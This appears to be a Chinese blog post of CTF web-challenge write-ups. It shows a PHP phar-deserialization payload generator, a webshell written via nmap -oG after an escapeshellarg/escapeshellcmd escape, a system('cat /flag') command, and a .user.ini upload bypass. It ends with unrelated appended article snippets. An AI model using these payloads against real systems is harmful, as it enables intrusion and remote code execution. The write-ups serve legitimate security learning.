[CISCN2019 华北赛区 Day1 Web1]Dropbox
打开题目,一个登录界面,SQL?
sqlmap跑一下,没有注入,那么注册一下
登录之后,发现只有一个上传页面,源码里面也没有什么
那就上传看看吧,只能上传图片格式的
上传一个试试
上传之后,发现有下载和删除选项,下载抓包看看。
在下载文件存在任意文件下载漏洞
在index.php里面看到包含了文件class.php,然后在下载其他文件,不过没有flag.php或者flag.txt
那么就代码审计
download.php,简单的对文件名做了一个限定
php
session_start();
if (!isset($_SESSION[' login ' ])) {
header( " Location: login.php " );
die();
}
if (!isset($_POST[' filename ' ])) {
die();
}
include " class.php " ;
ini_set( " open_basedir " , getcwd() . " :/etc:/tmp " );
chdir($_SESSION[ ' sandbox ' ]);
$file = new File();
$filename = (string ) $_POST[' filename ' ];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, " flag " ) === false ) {
Header( " Content-type: application/octet-stream " );
Header( " Content-Disposition: attachment; filename= " . basename($filename));
echo $file ->close();
} else {
echo " File not exist " ;
}
?>
delete.php,先post一个filename,然后判断文件名长度,并打开文件,最后删除文件
php
session_start();
if (!isset($_SESSION[' login ' ])) {
header( " Location: login.php " );
die();
}
if (!isset($_POST[' filename ' ])) {
die();
}
include " class.php " ;
chdir($_SESSION[ ' sandbox ' ]);
$file = new File();
$filename = (string ) $_POST[' filename ' ];
if (strlen($filename) < 40 && $file->open($filename)) {
$file ->detele();
Header( " Content-type: application/json " );
$response = array(" success " => true , " error " => "" );
echo json_encode($response);
} else {
Header( " Content-type: application/json " );
$response = array(" success " => false , " error " => " File not exist " );
echo json_encode($response);
}
?>
class.php
php
error_reporting( 0 );
$dbaddr = " 127.0.0.1 " ;
$dbuser = " root " ;
$dbpass = " root " ;
$dbname = " dropbox " ;
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
// 定义一个构造方法初始化数据库
public function __construct() {
global $db; // 调用全局变量
$this ->db = $db; // 初始化,连接数据库使用
}
// 定义一个判断用户是否存在的函数,在数据库里查询
public function user_exist($username) {
// prepare 用于预备一个语句,方便以后引用
$stmt = $this ->db->prepare(" SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1; " );
// bind_param() 该函数绑定了SQL的参数,告诉数据库参数的值,s为string
$stmt->bind_param(" s " , $username);
$stmt ->execute(); // execute()函数 用来执行之前预处理的语句
$stmt->store_result(); // 返回查询的数据
$count = $stmt->num_rows;
if ($count === 0 ) {
return false ;
}
return true ;
}
//
public function add_user($username, $password) {
if ($this ->user_exist($username)) {
return false ;
}
$password = sha1($password . " SiAchGHmFx " );
$stmt = $this ->db->prepare(" INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?); " );
$stmt ->bind_param(" ss " , $username, $password);
$stmt ->execute();
return true ;
}
// 确认用户存在
public function verify_user($username, $password) {
if (!$this ->user_exist($username)) {
return false ;
}
$password = sha1($password . " SiAchGHmFx " ); // 加盐哈希
$stmt = $this ->db->prepare(" SELECT `password` FROM `users` WHERE `username` = ?; " );
$stmt ->bind_param(" s " , $username);
$stmt ->execute();
$stmt ->bind_result($expect);
$stmt ->fetch();
if (isset($expect) && $expect === $password) {
return true ;
}
return false ;
}
// 析构函数,对象生命周期结束的时候调用,必定执行,在结束的时候,会调用close()函数,
// 在File类中可以看到,close函数,会执行file_get_contents(),来获取文件的内容
public function __destruct() {
$ this ->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$ this ->files = array();
$ this ->results = array();
$ this ->funcs = array();
$filenames = scandir($path);
$key = array_search(" . " , $filenames); // 在数组中搜索给定的值,成功则返回相应的键名。
unset($filenames[$key]); // 销毁键名
$key = array_search(" .. " , $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file ->open($path . $filename);
array_push($ this ->files, $file); // 将一个或多个单元压入数组的末尾,将file往files数组里面添加
$this ->results[$file->name()] = array(); // 这里得到上传文件名的名字,比如说,flag.txt
}
}
// 定义了一个魔术方法,用来监视一个对象的其他方法,如果调用了该类中没有定义的方法,就会触发该方法执行。
public function __call($func, $args) {
array_push($ this ->funcs, $func); // 如果调用了不存在的方法,将改方法放到funcs数组中
foreach ($this ->files as $file) { // 再从files数组中取出方法,利用这个元素去调用funcs中新增的func
$this ->results[$file->name()][$func] = $file->$func(); // $file->$func相当于close()函数
}
}
public function __destruct() {
$table = ' ' ;
$table . = ' ' ;
// 根据上面call魔术方法,funcs里面是FileList类里没有定义的方法,下面开始遍历
foreach ($this ->funcs as $func) {
$table . = ' ' . htmlentities($func) . ' ' ;
}
$table . = ' Opt ' ;
$table . = ' ' ;
foreach ($this ->results as $filename => $result) {
$table . = ' ' ;
// 这里遍历,我们构造的filename为/flag.txt,所以这里利用close方法,读取flag.txt的值
foreach ($result as $func => $value) {
$table . = ' ' . htmlentities($value) . ' ' ;
}
$table . = ' ' . htmlentities($filename) . ' ">下载 / 删除 ' ;
$table . = ' ' ;
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$ this ->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true ;
} else {
return false ;
}
}
public function name() {
return basename($this ->filename); // 该函数返回路径中,文件的部分,比如../../uploads/test.php ,返回的是test.php
// 利用的时候,flanamew设为/flag.txt,,则调用name函数的时候,返回的是flag.txt
}
public function size() {
$size = filesize($this ->filename);
$units = array(' B ' , ' KB ' , ' MB ' , ' GB ' , ' TB ' );
for ($i = 0 ; $size >= 1024 && $i < 4 ; $i++) $size /= 1024 ;
return round($size, 2 ).$units[$i];
}
public function detele() {
unlink($ this ->filename);
}
// 定义close()函数,用来获取文件的内容
public function close() {
return file_get_contents($this ->filename);
}
}
?>
从上面的三个代码审计可以知道,download.php代码就存在一个任意文件下载漏洞这么个作用,然后在delete.php执行的时候会post一个filename,并且会打开文件,然后删除文件,这里可以利用来读取文件
最后就是class.php,定义了三个类,User,FileList,File。
在User类中,重要关注的是析构函数,他会调用close()函数,而close函数是File类里面定义的一个用来读取文件内容
析构函数会在对象生命周期结束的时候调用,所以最终会调用close()函数,并且读取文件,没有回显,不会输出
那么输出只能在FileList类里面了,可以看到,里面有两个关键的方法,__call魔术方法,方法作用就不说了,上面代码里面说的清楚
__destruct()析构函数里面,有输出,会调用触发__call方法的方法,利用这个来读取文件,并输出。
对于上面的,我们需要使用phar:协议来绕过对flag字符的,读取文件
关于该协议,这里说的不错:https://xz.aliyun.com/t/2715
那么就可以创建User的对象,让db变量是FileList的对象,对象中的文件名定为的位置,猜为flag.txt这样db对象结束时就会调用析构函数,继而执行close函数。但是在db变量中是没有close方法的,所以会触发__call方法,这样就会变成执行了File对象的close方法,触发完__call方法之后,接下来就是析构函数,close方法执行后存在results变量里的结果会加入到table变量中被打印出来,也就是flag会被打印出来
下面是利用phar来构造payload:
php
class User {
public $db;
public function __construct(){
$ this ->db=new FileList;
}
}
class File{
public $filename;
}
class FileList{
private $files;
private $results;
private $funcs;
public function __construct(){
$file =new File;
$file ->filename=' /flag.txt ' ;
$ this ->files = array($file);
$ this ->results = array();
$ this ->funcs = array();
}
}
ini_set( ' phar.readonly ' ,0 );
@unlink( " phar.phar " );
$phar = new Phar("mortals .phar " ); // 后缀名必须为phar
$phar->startBuffering();
$phar ->setStub(" " ); // 设置stub
$mortals = new User();
$phar ->setMetadata($mortals); // 将自定义的meta-data存入manifest
$phar->addFromString("shell .txt " , " test " ); // 添加要压缩的文件
// 签名自动计算
$phar->stopBuffering();
?>
执行之后,会生成一个一个文件mortals.phar
上传phar,然后删除时,delete.php处存在file类的open函数,open函数存在file_exists()方法,这样就可以触发我们phar的反序列化,然后我们phar中调用了User类,User类destruct的时候,调用了db.close方法。抓包,改包,发包,利用phar://协议来读取文件,最终得到flag。
..............end..........
代码审计好难,懵懵懂懂的,看了各位大哥WP。
Online Tool
打开题目地址得到源码,代码审计:
php
if (isset($_SERVER[' HTTP_X_FORWARDED_FOR ' ])) { // 获取IP
$_SERVER[' REMOTE_ADDR ' ] = $_SERVER[' HTTP_X_FORWARDED_FOR ' ];
}
if (!isset($_GET[' host ' ])) {
highlight_file(__FILE__); // 对文件语法进行高亮显示
} else {
$host = $_GET[' host ' ];
$host = escapeshellarg($host); // 把字符串转码成可以在shell命令里使用的参数,将单引号进行转义,转义之后,再在左右加单引号
$host = escapeshellcmd($host); // 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将`|*?~<>^()[]{}$\, \x0A 和\xFF以及不配对的单/双引号转义
$sandbox = md5(" glzjin " . $_SERVER[' REMOTE_ADDR ' ]);
echo ' you are in sandbox ' .$sandbox;
@mkdir($sandbox); // 新建目录,默认权限,最大可能的访问权
chdir($sandbox); // 改变目录路径,成功返回true,失败返回false
echo system(" nmap -T5 -sT -Pn --host-timeout 2 -F " .$host);
// -sT,在目标主机的日志上记录大批连接请求和错误的信息
// -Pn,扫描之前不需要用ping命令,有些防火墙禁止使用ping命令
// -T5,时间优化参数,-T0~5,-T0扫描端口的周期大约为5分钟,-T5大约为5秒钟
// --host-time限制扫描时间
// -F,快速扫描
关键点在于这个两个函数,这两个函数结合在一起使用,且先调用escapeshellarg函数的时候,有危险
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
可以知道,escapeshellarg函数会先对host变量中的单引号进行转义,并且转义之后,在 \' 的左右两边再加上单引号,变成 '\''
接下来到escapeshellcmd函数,会对host变量中的特殊字符进行转义(`|*?~<>^()[]{}$\, \x0A//和\xFF以及不配对的单/双引号转义)
那么上面的 \ 就会被再次转义,比如变成 '\\''
在测试的时候得到,如果在字符串首尾加上单引号,经过escapeshellarg函数之后,就可以实现将单引号给闭合了,在经过escapeshellcmd函数的时候单引号就是配对的,就不会进行转义
比如说:
先后经过两个函数的变化:
escapeshellarg:''\'' mortals tx ''\''
escapeshellcmd: ''\\''mortals tx ''\\''
这样就可以实现单引号的逃逸了
在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件,也就是说我们可以使用这个参数
写一个一句话到sandbox里面去,然后执行就行了
在一句话里面,因为又特殊字符,所以经过escapeshellcmd函数的时候会被转义,但执行的时候就没了
来测试一下看看
可以看到,通过-oG参数,得到了一个text1的文件(高版本的可以使用-oN,题目环境为php5版本),里面就有写的一句话,变正常了
也就是说,可以这样构造来一句话后门了
?host=' -oG mortals.php '
根据给的源码知道,执行之后,会生成一个目录,然后这个文件就到了生成的目录中
在生成的目录下执行mortals.php文件,然后蚁剑连接
可以看到,上传成功,并且,可以打开终端了,在根目录下,可以发现flag文件
打开,即可获得flag。
当然,也可以将一句话中的POST改为GET,然后再URL上直接执行系统命令,获取flag
/mortals.php?tx=system('cat /flag');
参考资料:
https://paper.seebug.org/164/#0-tsina-1-56231-397232819ff9a47a7b7e80a40613cfe1
https://althims.com/2019/07/25/buu-online-tool-wp/
https://v0w.top/2018/04/21/SKCTF2-wp/#web-nmap
http://eustiar.tk/archives/521
http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/#%E4%B8%80-%E5%89%8D%E6%83%85%E6%8F%90%E8%A6%81
[SUCTF 2019]CheckIn
基于各位师傅的WP,复现,学习
上传的题目
题目的考点是利用.user.ini漏洞
通过查看P牛关于.user.ini文件利用:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html
可以知道PHP_INI配置文件的一些配置,可以通过.user.ini来实现,而.user.ini文件是用户自定义的
可以设置PHP_INI里面除了PHP_INI_SYSTEM模式外的之外的配置文件
而在PHP_INI里面有个配置是.user.ini是有权设置的:auto_prepend_file,通过这个设置可以实现包含文件
在该题里面,禁止了很多,但是对于上传的文件,是通过exif_image来判断上传的文件头,读取一个图像的第一个字节并检查其签名。
可以在上传的文件头加一个图片的文件头就可以了
那么现在就是制作.user.ini文件和一句话,先上传.user.ini文件来实现包含,上传之后还给出了文件所在目录
接着上传test.png
上传成功之后,访问即可获得flag
转载于:https://www.cnblogs.com/mortals-tx/p/11396708.html
你可能感兴趣的:(BUUCTF复现记录2)
自然语言处理之语法解析:BERT:自然语言处理基础理论
zhubeibei168
自然语言处理 1024程序员节 自然语言处理 bert 语音识别 人工智能
自然语言处理之语法解析:BERT:自然语言处理基础理论自然语言处理基础自然语言处理的定义与应用自然语言处理(NaturalLanguageProcessing,NLP)是计算机科学领域与人工智能领域中的一个重要方向。它研究如何处理和运用自然语言;自然语言认知则是指让计算机“懂”人类的语言。NLP建立于20世纪50年代,随着计算机技术的飞速发展,NLP技术在信息检索、文本挖掘、语音识别、机器翻译、情
2.28 图像分类全解析:从境界到评估,再到模型与样本处理
不要天天开心
机器学习 算法 人工智能
图像分类将不同的图像,划分到不同的类别标签,实现最小的分类误差。图像分类的三层境界:通用的多类别图像分类子类细粒度图像分类实例级图片分类图像分类评估指标之混淆矩阵:TP(Truepositive,真正例)——将正类预测为正类数。FP(Falsepostive,假正例)——将反类预测为正类数。TN(Truenegative,真反例)——将反类预测为反类数。FN(Falsenegative,假反例)—
Weex中使用vue.js
前端_学习之路
跨平台开发 vue.js 前端 javascript
在WeexSDKv0.10.0以及后续的版本中,集成了v2版本的Vue.js。Vue是一套构建用户界面的渐进式框架,截止于作者发文,Weex官方没有对Vue3提供支持。内置构建版本Vue.js有两种构建版本:运行时+编译器与只包含运行时。它们之间的区别在于编译器是否需要能够在运行时编译template选项。由于运行时构建版本比完整版本的构建版本轻约30%(Vue官方估算),为了更好的性能和更小的代
【从入门到精通】Python必会的基础知识和基本语法,看这一篇就够了
天若有情673
Python是一种高级、解释型、面向对象的编程语言,具有简洁易读的语法特点。以下是Python的一些基本语法:1.注释注释用于解释代码的功能和用途,Python中有单行注释和多行注释。#这是单行注释"""这是多行注释可以写很多内容"""2.变量和数据类型变量变量用于存储数据,在Python中不需要声明变量类型,解释器会根据赋值自动推断。#定义一个整数变量num=10#定义一个字符串变量name="
COCO2017 数据集的下载方法
骆驼穿针眼
mmdet问题集 计算机视觉与深度学习 数据集下载 人工智能 python
下载方法(一)COCO数据集下载地址:https://cocodataset.org/#home#imageswgethttp://images.cocodataset.org/zips/train2017.zip#traindatasetwgethttp://images.cocodataset.org/zips/val2017.zip#validationdatasetwgethttp://i
大模型生成文本控制参数:Top-k Top-p和Temperature(超级易懂,看一眼就学废)
Ven%
简单说深度学习 深度学习基础动手 深度学习速通系列 python 机器学习 人工智能 深度学习 自然语言处理
温度(Temperature)作用:就像调节"脑洞大小"的开关。温度调低(比如0.2):AI会变成保守派,总选最稳妥的回答(适合写说明书、正经文案)温度调高(比如1.0):AI就变戏精,各种天马行空(适合编故事、写段子)Top-k(候选词数量)作用:每次选词时的"候选名单人数"设小值(比如10):AI只能在10个最合适的词里挑(回答更靠谱)设大值(比如50):AI能考虑50个可能的词(回答花样更多
2025年网络安全全景解析:十大趋势、攻防演练与未来挑战(附实战资源)
emmm形成中
网络安全 web安全 安全 网络安全
2025年网络安全全景解析:十大趋势、攻防演练与未来挑战(附实战资源)摘要:2025年网络安全领域正经历前所未有的变革。本文从十大技术趋势、国家级攻防演练(HVV)实战策略、AI驱动的威胁与防御体系等维度深度解析当前安全格局,并附赠零基础到精通的网安学习资源。结合最新法规、技术突破与实战案例,助你掌握攻防核心逻辑,抢占安全制高点![推荐收藏][文末福利]一、2025年网络安全十大核心趋势(附行业影
常见的Python框架--matplotlib
我有颗小粒的痣
Python python matplotlib
matplotlib获取方法:https://matplotlib.org/users/installing.html#building-on-linuxsudoapt-getinstallpython-matplotlib#python2.sudoapt-getinstallpython3-matplotlib#python3.简介用于数据可视化#easyexampleimportmatplot
在 macOS 使用 .pem 私钥免密登录腾讯云服务器
橙子小哥的代码世界
基础知识 linux macos 腾讯云 服务器 ssh
前言在腾讯云上创建服务器时,如果选择了「密钥对」的登录方式,就会得到一个.pem文件作为私钥。很多小伙伴在使用macOS系统时,可能不清楚如何使用这个私钥文件来SSH免密登录远程服务器。本文将详细介绍如何在本地配置.pem私钥文件并成功登录腾讯云服务器。1.在腾讯云上创建密钥对1.登录腾讯云控制台,选择「密钥管理」或在创建服务器(CVM)时选择「密钥对」的登录方式。2.创建密钥对后,系统会提供一个
读写锁 优先级 linux,详谈Linux操作系统的三种状态的读写锁
hikhannah
读写锁 优先级 linux
读写锁是另一种实现线程间同步的方式。与互斥量类似,但读写锁将操作分为读、写两种方式,可以多个线程同时占用读模式的读写锁,这样使得读写锁具有更高的并行性。读写锁的特性为:写独占,读共享;写锁优先级高。对于读写锁,掌握了这12个字就足矣了。Linux环境下,读写锁具有以下三种状态:读模式下加锁状态(读锁)写模式下加锁状态(写锁)不加锁状态虽然读写锁有读锁、写锁、不加锁三种状态,但其实它只有一把锁,而非
《阿里游戏高可用架构设计实践》读后感
weixin_34343689
数据库 后端 运维
《阿里游戏高可用架构设计实践》读后感在文章当中我印象最深刻的一句话是“高可用的系统是设计出来的,不是靠运维保障出来的!”游戏出现故障会有很多原因,并不是说除了程序Bug以外,可能其他都是运维背黑锅了。其实,这些问题背后真正的原因是系统设计方案有问题,也就是说,技术上是比较弱的。1、高可用目标-传统方法高可用其实都是指几个9,5个9的话可能就是电信级或者金融级的,互联网大部分是3个9到4个9。2、高
20250228下载MOOC课程的视频【单集】
南棱笑笑生
杂质 音视频
20250228下载MOOC课程的视频【单集】2025/2/2823:56方法一:通过m3u8的链接/索引文件,批量下载,不过有点慢。保险起见,可以下载2次。实践中有些时候会丢包。还有下载链接根据时间可能会随时动态改变!方法二:你看一遍就会出现所有的ts切片,通过工具比如:迅雷之类的讲全部的ts都下载,然后通过工具合并起来。ffmpeg-i"concat:output1.ts|output2.ts
用Python复制Word内容并使用格式设字体与大小
txlgl
网上流传的部分可以百度关键词“Python”和“word”后查看文章学习,以下内容为个人实践,修正了不能运行出错的情况。importwin32comfromwin32com.clientimportDispatch,constantsw=win32com.client.Dispatch('Word.Application')#或者使用下面的方法,使用启动独立的进程:#w=win32com.clie
IOS基础面试题
程序员林北北
ios cocoa macos
1.什么是MVC?MVC(Model-View-Controller)是一种常见的设计模式,用于组织代码Model(模型):代表数据层,处理数据的逻辑。View(视图):负责展示界面,显示数据。Controller(控制器):连接Model和View,处理视图的更新以及用户交互。2.什么是Delegate?Delegate是iOS中一种常用的设计模式,用于对象之间的通信。一个对象通过delegat
委托者模式(掌握设计模式的核心之一)
cccccchd
设计模式
目录问题:举例:总结:核心就是利用Java中的多态来完成注入。问题:今天刷面经,刷到装饰者模式,又进阶的发现委托者模式,发现还是不理解,特此记录。举例:老板(委托者):“我有个需求要做,但具体咋做我不关心,你(被委托者)按我的规则(接口)搞定就行。”→只提要求,不亲自干活。员工(被委托者):“老板放心,我按你定的规则(接口)来办!”→遵守接口承诺,实现具体逻辑。协商的规则(接口):“需求必须通过P
宝塔解除域名限制
溫冬''123
服务器 运维
因为SSL证书过期,然后宝塔访问的域名绑定的也是这个。导致宝塔面板无法访问客服:链接服务器终端执行bt12取消域名绑定即可
阿里云ESC windws服务器部署springboot+vue前后端分离项目
溫冬''123
项目部署 spring boot 阿里云 服务器
window服务器部署springboot+vue项目前期准备:1、完整的项目源码我这里的项目前端是vue,后端是springboot+redis+mysql2、服务器我使用的是阿里云的ESC服务器(偷偷告诉你们,新手都可以白嫖一个月的服务器)服务器系统是windows至于我为什么不用linux,害别说了,新手还是先用window先吧。3、服务器环境搭建我们部署项目需要搭建项目的环境,其实仔细想想
Linux进程间的关系
油菜花的菜
Linux系统编程和网络编程 linux 运维 vim
Linux进程间的关系Linux下每个进程都隶属于一个进程组,每个进程都包含PID、PGID、SID。文章目录Linux进程间的关系前言一、进程组二、会话三、ps命令查看进程间的关系四、系统资源限制五、改变工作目录和根目录六、服务器程序后台化前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础
3-4、ASP.NET中Session的sessionState 4种mode模式(StateServer与SQLServer)
qq_43023809
asp.net c#编程 asp.netmvc asp.net 面试题
一.SessionState的4种mode模式在ASP.NET中Session的sessionState的4中mode模式:Off、InProc、StateServer及SqlServer。1.Off模式关闭模式,即不需要使用Session。单个页面关闭Session:2.InProc模式(缺省模式)mode设置为"InProc"时,Session直接存储在IIS进程中。优点:获取session状
Spring学习01
nightelves11
spring Java spring java 后端
spring学习011.微服务*2.反应式框架3.云原生开发*4.web应用5.无服务器技术6.事件驱动7.批处理project(Java开发各个方面)frameworkbootdata处理数据cloud云原生security安全管理session共享会话integration集成Hateoas媒体服务restdocs文档Batch批处理CredHubStatemachine状态机-…IOC控制反
DINO-X:一种用于开放世界目标检测与理解的统一视觉模型
黄阳老师
目标检测 目标跟踪 人工智能
DINO-X:一种用于开放世界目标检测与理解的统一视觉模型摘要1引言2方法2.1模型架构2.1.1DINO-XPro2.1.2DINO-XEdge3数据集构建和模型训练数据收集模型训练摘要在本文中,我们介绍了DINO-X,这是一种由IDEAResearch团队开发的统一以对象为中心的视觉模型,迄今为止在开放世界目标检测性能方面表现最佳。DINO-X采用了与GroundingDINO1.5[47]相
【赵渝强老师】Kafka的消费者与消费者组
大数据kafka
消费者就是从Kafka集群消费数据的客户端,下图展示了一个消费者从主题中消费数据的模型。上图展示的是单消费者模型。单消费者模型存在一些问题。如果Kafka上游生产的数据很快,超过了单个消费者的消费速度,那么就会导致数据堆积。视频讲解如下:https://www.bilibili.com/video/BV1ue2EYxEpL/?aid=113269394117...为了解决单消费者存在的问题,Kaf
OAK相机的抗震性测试
OAK中国_官方
数码相机 抗震测试
在工业环境中,双目视觉相机必须具备与工作环境同等的坚固性。鉴于部分客户会将我们的相机应用于恶劣环境(例如安装在重型机械上),我们依据EN60068-2-6:2008标准对相机进行了振动耐受性测试。测试涉及的相机型号包括:OAK-D-Pro(间接涵盖OAK-D-S2、OAK-D-ProW、OAK-D-W)OAK-D-Pro-PoE(间接涵盖OAK-D-S2-PoE、OAK-D-W-PoE、OAK-D
Linux挂载samba共享文件夹
linux运维samba
一:场景⼀台Linux服务器⼀台Windows服务器,且开启了samba共享\xx.xx.xx.xx\share需求:将Linux服务器上指定目录的的⽂件存储⾄samba共享上二:实现1:安装CIFS客户端yuminstallcifs-utils2:实现挂载samba共享文件夹#创建挂载目录mkdir-p/data/share#挂载samba服务器#mount.cifs-ousername=mou
C# .Net 开发设计多用户网上商城源码_OctShop
随着C#在TIOBE编程语言排行不断上升,这也标志着越来越多的程序员开始使用C#来开发项目了。在TIOBE2023年10月公布的排行中,C#和Java之间的差距越来越小了,仅为1.2%,随着C#.NetCore的免费开源,这一上升的趋势越来越明显,TIOBECEOPaulJansen认为,如果这一趋势继续保持,那么C#将在两个月后超过Java。在当前所有的编程语言中,Java出现了大幅度下跌,为-
前端2025
家里有只小肥猫
前端
2025前端面试总结:趋势、技巧与准备建议随着前端技术的飞速发展,2025年的前端面试不仅考察技术深度,更注重实践能力和对新技术的掌握。作为一名前端开发者,如何在激烈的竞争中脱颖而出,是每一位求职者都需要思考的问题。本文将结合2025年的前端技术趋势,分享面试总结、常见问题及准备建议,帮助大家更好地应对未来的面试挑战。一、2025年前端技术趋势总结WebComponents的广泛应用WebComp
2025前端技能
家里有只小肥猫
前端
前端开发是现代Web开发中非常重要的一部分,涉及众多技术和工具。以下是一些在前端开发工作中常见的需求和技术:1.技术基础HTML/CSS:构建页面结构和样式。JavaScript:实现交互逻辑和动态功能。ES6+:使用现代JavaScript语法和特性。DOM操作:操作网页元素和事件处理。浏览器兼容性:确保代码在不同浏览器中正常运行。跨设备适配:确保页面在不同设备(PC、手机、平板)上正常显示。2
【Pytorch】基于LSTM-KAN、BiLSTM-KAN、GRU-KAN、TCN-KAN、Transformer-KAN(各种KAN修改一行代码搞定)的共享单车租赁预测研究(数据可换)Python
冒泡芳
python pytorch lstm
欢迎来到本博客❤️❤️博主优势:博客内容尽量做到思维缜密,逻辑清晰,为了方便读者。⛳️座右铭:行百里者,半于九十。本文目录如下:目录⛳️赠与读者1概述一、研究背景与意义二、TCN与KAN简介三、基于TCN-KAN的共享单车租赁预测模型四、研究挑战与展望基于LSTM-KAN、BiLSTM-KAN、GRU-KAN、TCN-KAN、Transformer-KAN的共享单车租赁预测研究1.引言2.模型介绍
RocketMQ消费者重平衡机制
俏布斯
消息中间件 RocketMQ rocketmq
RocketMQ的消费者重平衡机制确保在消费者组内成员变化时,消息队列(MessageQueue)被合理分配。以下是详细的解析:重平衡机制概述触发条件:消费者启动或关闭。定时触发(默认20秒一次)。Topic的队列数量变化。消费者组内成员变化(通过心跳检测)。目标:在集群模式下,每个队列仅被一个消费者消费,确保负载均衡。流程:获取Topic的队列列表和当前消费者组成员。根据分配策略重新分配队列。释
安装pycrypto报错
名难取aaa
bug Windows 我的一生之敌 pip
报错信息解决方法网上有两种解决方案:pycrypto安装出错的问题我选择第二种(更为简单):在安装MicrosoftVisualStudio的目录下(或者目录附近),找到..\VC\Tools\MSVC\14.10.25017\include\stdint.h并且拷贝到..\WindowsKits\10\Include\10.0.15063.0\ucrtPS:建议用everything(一个软件)
JAVA基础
灵静志远
位运算 加载 Date 字符串池 覆盖
一、类的初始化顺序
1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器
同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。
二、String
1 String a = "abc";
JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
keepalived实现redis主从高可用
bylijinnan
redis
方案说明
两台机器(称为A和B),以统一的VIP对外提供服务
1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A)
2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务
3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
java文件操作大全
0624chenhong
java
最近在博客园看到一篇比较全面的文件操作文章,转过来留着。
http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html
转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html
一.获得控制台用户输入的信息
&nbs
android学习任务
不懂事的小屁孩
工作
任务
完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
zoom.js
换个号韩国红果果
oom
它的基于bootstrap 的
https://raw.github.com/twbs/bootstrap/master/js/transition.js transition.js模块引用顺序
<link rel="stylesheet" href="style/zoom.css">
<script src=&q
详解Oracle云操作系统Solaris 11.2
蓝儿唯美
Solaris
当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。
spring学习——springmvc(一)
a-john
springMVC
Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。
1,跟踪Spring MVC的请求
请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
hdu4342 History repeat itself-------多校联合五
aijuans
数论
水题就不多说什么了。
#include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
EJB和javabean的区别
asia007
bean ejb
EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了
1.EJB用于服务端应用开发, 而JavaBeans
Struts的action和Result总结
百合不是茶
struts Action配置 Result配置
一:Action的配置详解:
下面是一个Struts中一个空的Struts.xml的配置文件
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
&quo
如何带好自已的团队
bijian1013
项目管理 团队管理 团队
在网上看到博客"
怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点:
1.诚信
对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
Java代码混淆工具
sunjing
ProGuard
Open Source Obfuscators
ProGuard
http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
【Redis三】基于Redis sentinel的自动failover主从复制
bit1129
redis
在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。
什么是Sentine
使用代理实现Hibernate Dao层自动事务
白糖_
DAO spring AOP 框架 Hibernate
都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。
public void save(Object obj){
Session session = this.getSession();
Transaction tran = session.beginTransaction();
try
maven3实战读书笔记
braveCS
maven3
Maven简介
是什么?
Is a software project management and comprehension tool.项目管理工具
是基于POM概念(工程对象模型)
[设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复]
